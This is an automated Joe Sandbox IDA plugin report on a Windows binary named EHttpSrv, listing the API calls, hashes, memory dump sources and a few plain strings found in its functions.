• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: Time$#2310#310#578#896DateFileFormatSystem
• String ID:
• API String ID: 1214211288-0
• Opcode ID: 6ed68abcd28ce48f2fbeb676e58b4509ff3b508b12a135595b734adc215a4cd3
• Instruction ID: 05188214ffbfdb47170fc93420c0872eb3a8fe3c16bd2a1318f7243c7ef8323f
• Opcode Fuzzy Hash: 6ed68abcd28ce48f2fbeb676e58b4509ff3b508b12a135595b734adc215a4cd3
• Instruction Fuzzy Hash: A62142B1108741AFD324DF64CC89FAAB7E4FB88715F00892DF196862E0EF789544DB52
APIs
• #764.MFC80U(?,76945540,2044717A), ref: 20417A7B
• #764.MFC80U(?,76945540,2044717A), ref: 20417A97
• #764.MFC80U(?,76945540,2044717A), ref: 20417AB9
• #764.MFC80U(?,76945540,2044717A), ref: 20417AD2
• #764.MFC80U(?,76945540,2044717A), ref: 20417AEB
• #764.MFC80U(?,76945540,2044717A), ref: 20417B07
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764
• String ID:
• API String ID: 441403673-0
• Opcode ID: e27f454289218852687a0a50fc370cd0d11d2e5be6741b802adb9106cb9d2f23
• Instruction ID: d6b260b91b2afa18662dcd0aa496fce44bf5087fc199903c461d7b48f04e172e
• Opcode Fuzzy Hash: e27f454289218852687a0a50fc370cd0d11d2e5be6741b802adb9106cb9d2f23
• Instruction Fuzzy Hash: 7011B6F0D01B508BD621DF6A9841A57F7F9BFA0604F548D1EE19AC3A20D3B9F5448F41
APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: RectWindow$#1894#2651#4119#5609
• String ID:
• API String ID: 3214300710-0
• Opcode ID: 1e99c9a13bc6be8278a85a2e538068f55881aa7fabc93538300013c71da43b19
• Instruction ID: a0c356166229a589cb426dd41d67ea829bd0afa39bcfa3783ce831c5abca2097
• Opcode Fuzzy Hash: 1e99c9a13bc6be8278a85a2e538068f55881aa7fabc93538300013c71da43b19
• Instruction Fuzzy Hash: D91194712087025FC204DFA9C880D6FB7E8FBD9614F008A1DB98593250DA38ED05CB91
APIs
• GetCurrentObject.GDI32(?,00000006), ref: 2043BAF1
• GetObjectW.GDI32(00000000,0000005C,?), ref: 2043BB01
• CreateFontIndirectW.GDI32(?), ref: 2043BB0C
• SelectObject.GDI32(?,00000000), ref: 2043BB14
  • Part of subcall function 2043B8A0: GetTextMetricsW.GDI32(?,?), ref: 2043B8B1
  • Part of subcall function 2043B8A0: GetTextExtentPoint32W.GDI32(?,2048B8C8,00000001,?), ref: 2043B8C4
  • Part of subcall function 2043B8A0: memset.MSVCR80 ref: 2043B8D3
• SelectObject.GDI32(?,00000000), ref: 2043BB3C
• DeleteObject.GDI32(00000000), ref: 2043BB43
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: Object$SelectText$CreateCurrentDeleteExtentFontIndirectMetricsPoint32memset
• String ID:
• API String ID: 2269657172-0
• Opcode ID: 8d39f8bf82fdabb041275fa10538bb64814c54a3a0a6bb52cd58f27b94c9564d
• Instruction ID: c0e3721598ee792724bbe563eaaf6ce25a994d6c8023372eb2cb07eff0f08ebf
• Opcode Fuzzy Hash: 8d39f8bf82fdabb041275fa10538bb64814c54a3a0a6bb52cd58f27b94c9564d
• Instruction Fuzzy Hash: 321130B5508705AFD310EFA48C89A7BB7ACFB89606F108C1CFB5592255DE7998048BA2
                                                                                                                APIs
                                                                                                                • SetRectEmpty.USER32(?), ref: 204384B3
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204384C2
                                                                                                                • GetDC.USER32(?), ref: 204384D4
                                                                                                                • #2361.MFC80U(00000000), ref: 204384DB
                                                                                                                • GetTextExtentPoint32W.GDI32(00000000,2048B8C8,00000001,00000000), ref: 204384F6
                                                                                                                • ReleaseDC.USER32(?,?), ref: 20438504
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#2361EmptyExtentPoint32ReleaseTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1840419848-0
                                                                                                                • Opcode ID: a581caf8df79517cd945ad324e0a4fd0f37ce596f542015ce5c6ca5b8c9c3f65
                                                                                                                • Instruction ID: 496008046cc68aad03aa913379702d96c16767321fb24cf3775948f9e0ec9cee
                                                                                                                • Opcode Fuzzy Hash: a581caf8df79517cd945ad324e0a4fd0f37ce596f542015ce5c6ca5b8c9c3f65
                                                                                                                • Instruction Fuzzy Hash: 3D017072204705AFC714DFA8CC89867BBECFB88219B00CA1DF98587644DA74E809CBA1
                                                                                                                APIs
                                                                                                                • #656.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D33
                                                                                                                • #656.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D43
                                                                                                                • #741.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D53
                                                                                                                • #741.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D63
                                                                                                                • #587.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D73
                                                                                                                • #605.MFC80U(FEEA6C22,?,?,2047B7F8,000000FF,20428343,?), ref: 20422D82
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #656#741$#587#605
                                                                                                                • String ID:
                                                                                                                • API String ID: 2045721391-0
                                                                                                                • Opcode ID: e2b5862769a4427eae46f48d823d9ee51c2a6fd6aec84f59f66b854840967707
                                                                                                                • Instruction ID: 9f5cefbeefa0941ab7df07d9c822c4b112fbf010f8018cdb454d69d8254480c9
                                                                                                                • Opcode Fuzzy Hash: e2b5862769a4427eae46f48d823d9ee51c2a6fd6aec84f59f66b854840967707
                                                                                                                • Instruction Fuzzy Hash: 67015A710087818BC315CF24C855BEABBF4FB65728F80CE1DE0E6936A0DB786609C796
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 20439B96
                                                                                                                • memset.MSVCR80 ref: 20439BEA
                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000200,?,?,?,?,?), ref: 20439DE8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateFileHandlememset
                                                                                                                • String ID: $$0
                                                                                                                • API String ID: 2300874326-389342756
                                                                                                                • Opcode ID: 057662e644b0b9a3d99144212f4c6014112c615fb078cfd1729006145fb7cb57
                                                                                                                • Instruction ID: 04d4c340668600435f704b31e0fa8d8e5d729e4efcc25c61fd6eacbfdca0a0c7
                                                                                                                • Opcode Fuzzy Hash: 057662e644b0b9a3d99144212f4c6014112c615fb078cfd1729006145fb7cb57
                                                                                                                • Instruction Fuzzy Hash: 4191F8B15083419FD350DF64C885BABBBE9BBC8744F10892DF999C7290EB78D944CB52
                                                                                                                APIs
                                                                                                                • GetTextExtentPoint32W.GDI32(?,2048B8C8,00000001,?), ref: 2043B5F8
                                                                                                                • GetTextMetricsW.GDI32(?,?), ref: 2043B633
                                                                                                                • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 2043B673
                                                                                                                • DrawTextW.USER32(?,?,?,?,00008020), ref: 2043B6CC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Text$ExtentPoint32$DrawMetrics
                                                                                                                • String ID:
                                                                                                                • API String ID: 7047841-3916222277
                                                                                                                • Opcode ID: a6e062c6499c17f33c23375c66fc969aad25fadcdc9bef878475d3043f4a74b2
                                                                                                                • Instruction ID: cd33e530e8e5d1403df619d4bd40830191e19536f182b1d6df7ce893f6c7a7bf
                                                                                                                • Opcode Fuzzy Hash: a6e062c6499c17f33c23375c66fc969aad25fadcdc9bef878475d3043f4a74b2
                                                                                                                • Instruction Fuzzy Hash: 288125756047018BC764DF68C981AABB7F1FF88204F509A1DE5CA83B51EB34E949CB92
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2045574E
                                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 204558D9
                                                                                                                • #6232.MFC80U(00000000,?), ref: 204558F0
                                                                                                                • #6751.MFC80U(00000000,?,00000000,?), ref: 20455922
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #314#6232#6751MessageSend
                                                                                                                • String ID: DetectAppChanging
                                                                                                                • API String ID: 4076680601-2516610685
                                                                                                                • Opcode ID: dd83c7099006d640d4028cd5ef4313dbfd9bec513ddbd34065a42c64c41d866c
                                                                                                                • Instruction ID: 01685508ceafbcd4e3093f46b1938b49ce02c36cf81fe32ffcfde260fc9db048
                                                                                                                • Opcode Fuzzy Hash: dd83c7099006d640d4028cd5ef4313dbfd9bec513ddbd34065a42c64c41d866c
                                                                                                                • Instruction Fuzzy Hash: 525183715087419FC314DFA4C8D0BAAFBE5BFA4718F508B2DF19897290C778A958CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043CFE0: wcscpy_s.MSVCR80 ref: 2043D00F
                                                                                                                  • Part of subcall function 2043CFE0: wcscpy_s.MSVCR80 ref: 2043D065
                                                                                                                  • Part of subcall function 2043CFE0: wcscpy_s.MSVCR80 ref: 2043D0A5
                                                                                                                  • Part of subcall function 2043CFE0: wcscpy_s.MSVCR80 ref: 2043D101
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 20442E95
                                                                                                                • swprintf_s.MSVCR80 ref: 20442EB4
                                                                                                                • swprintf_s.MSVCR80 ref: 20442F3F
                                                                                                                  • Part of subcall function 2043C6E0: free.MSVCR80 ref: 2043C71E
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 20442FAE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s$CriticalSectionswprintf_s$EnterLeavefree
                                                                                                                • String ID: NODE;NAME=%s;TYPE=SUBNODE
                                                                                                                • API String ID: 1679566870-1146357381
                                                                                                                • Opcode ID: 300c08941aa98cdd12e71b9335bfd12ee22951b283c6f9c713b90c7db156eaf8
                                                                                                                • Instruction ID: f148fae018eb77c923de99daf751580223cfb0c657fecf375db81c05a93d6ced
                                                                                                                • Opcode Fuzzy Hash: 300c08941aa98cdd12e71b9335bfd12ee22951b283c6f9c713b90c7db156eaf8
                                                                                                                • Instruction Fuzzy Hash: 8841C7706087015FE314DFA4C981B6BB7E59FA8608F90882CFE8983341DA7DE94DD792
                                                                                                                APIs
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2041E145
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2041E179
                                                                                                                • #1176.MFC80U(?,00000000,IP_RANGE,2041F192,?,?), ref: 2041E1A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_s$#1176
                                                                                                                • String ID: %d.%d.%d.%d$IP_RANGE
                                                                                                                • API String ID: 2565221431-1721630847
                                                                                                                • Opcode ID: 49220e3e8c8959c2477940a03975da61ffd8b4cd5e5257e2152aac5567fa5f25
                                                                                                                • Instruction ID: 8c70e820a42cc0ef8199f5320f7b48e118a5ff02f37061a88ee0ced0dda78f7a
                                                                                                                • Opcode Fuzzy Hash: 49220e3e8c8959c2477940a03975da61ffd8b4cd5e5257e2152aac5567fa5f25
                                                                                                                • Instruction Fuzzy Hash: E321F375008654AFD3248B968C80F37F7E9AFC9704F09CA8DF9A807292D639F9449B20
                                                                                                                APIs
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2041E205
                                                                                                                • _snwprintf_s.MSVCR80 ref: 2041E239
                                                                                                                • #1176.MFC80U(?,00000000,IP_RANGE,?,00000000,IP_RANGE,2041F192,?,?), ref: 2041E260
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_s$#1176
                                                                                                                • String ID: %d.%d.%d.%d$IP_RANGE
                                                                                                                • API String ID: 2565221431-1721630847
                                                                                                                • Opcode ID: 009708743ea9818ec7ad0d2cc6a41fbe2433ea119526d0ec921832998b0044b0
                                                                                                                • Instruction ID: 61b2732691e54731793042617214c6e827681a1db8e85d9a3db6ce66c5009b46
                                                                                                                • Opcode Fuzzy Hash: 009708743ea9818ec7ad0d2cc6a41fbe2433ea119526d0ec921832998b0044b0
                                                                                                                • Instruction Fuzzy Hash: 962120340096549ED3648B96CD90E33F7F9ABCAB04F09C98DF8A4472A2D238F9449B20
                                                                                                                APIs
                                                                                                                • GetEnvironmentVariableW.KERNEL32(APPDATA,00000000,00000000,?,?,00000074,204411DB,?,00000000), ref: 20442D9A
                                                                                                                • malloc.MSVCR80 ref: 20442DAF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentVariablemalloc
                                                                                                                • String ID: APPDATA
                                                                                                                • API String ID: 1015899132-4054820676
                                                                                                                • Opcode ID: e5ed7cc41b6f1eeb17cad5362a1277d3937bd62b615e593f88bc3bc90783f534
                                                                                                                • Instruction ID: 399d6329eac5c24fb3c80049560c3f0fde6e9d094a0bf09a4978420cbd522793
                                                                                                                • Opcode Fuzzy Hash: e5ed7cc41b6f1eeb17cad5362a1277d3937bd62b615e593f88bc3bc90783f534
                                                                                                                • Instruction Fuzzy Hash: 8311BFB26057026AE310DF85DC84B67B398FBC4756F10892EFA4186240EB79E918C7A6
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$swscanf_swcscspn
                                                                                                                • String ID: ;,
                                                                                                                • API String ID: 372877846-2160969846
                                                                                                                • Opcode ID: 115a5b567d316050a3f747767341e443d573e0f1640489c73d189da7d107d0af
                                                                                                                • Instruction ID: 83b26625e96d8970be58b0dd86d482f679ae9785e3e383a395c437aaa651944f
                                                                                                                • Opcode Fuzzy Hash: 115a5b567d316050a3f747767341e443d573e0f1640489c73d189da7d107d0af
                                                                                                                • Instruction Fuzzy Hash: 2811E771601213A6EB108F94DC8456773E4FF80266F10DD2DFD51A3240F77D9D5587A1
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32 ref: 2045F989
                                                                                                                • ScreenToClient.USER32(?,00000000), ref: 2045F99B
                                                                                                                • #3793.MFC80U(00000000,?,?), ref: 2045F9B6
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 2045F9D5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3793ClientCursorMessageScreenSend
                                                                                                                • String ID: F
                                                                                                                • API String ID: 2192606099-1304234792
                                                                                                                • Opcode ID: c1b02fb2e73d36783ef106c15e9ce598c6b04e6ea6825887fd932bac7e8e4ee9
                                                                                                                • Instruction ID: 80928f24070fcba48f7bac73c9c1762405fb736f405f160aeaa39f66132af33b
                                                                                                                • Opcode Fuzzy Hash: c1b02fb2e73d36783ef106c15e9ce598c6b04e6ea6825887fd932bac7e8e4ee9
                                                                                                                • Instruction Fuzzy Hash: AEF081B5508705BBC304DB64CC89FA7BBECEB88715F00CA1EB99983190EB74A804C792
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32 ref: 2045CF19
                                                                                                                • ScreenToClient.USER32(?,00000000), ref: 2045CF2B
                                                                                                                • #3793.MFC80U(00000000,?,?), ref: 2045CF46
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 2045CF65
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3793ClientCursorMessageScreenSend
                                                                                                                • String ID: F
                                                                                                                • API String ID: 2192606099-1304234792
                                                                                                                • Opcode ID: d3287485287acd700b6024ef1f140c52c484e9c25ee022c7e01d1cd40f9d1640
                                                                                                                • Instruction ID: f69385dd0af284a01ae3ba057e28231b8480156d648f90a51f256bc835e075d5
                                                                                                                • Opcode Fuzzy Hash: d3287485287acd700b6024ef1f140c52c484e9c25ee022c7e01d1cd40f9d1640
                                                                                                                • Instruction Fuzzy Hash: E6F0A4B6508705BFC304DB64CC85FD7BBECDB88715F00C91DB99983290EA74A904D791
                                                                                                                APIs
                                                                                                                • #3990.MFC80U(?,00000039,FEEA6C22,?,00000000,20479989,000000FF,2044D616), ref: 2044D92A
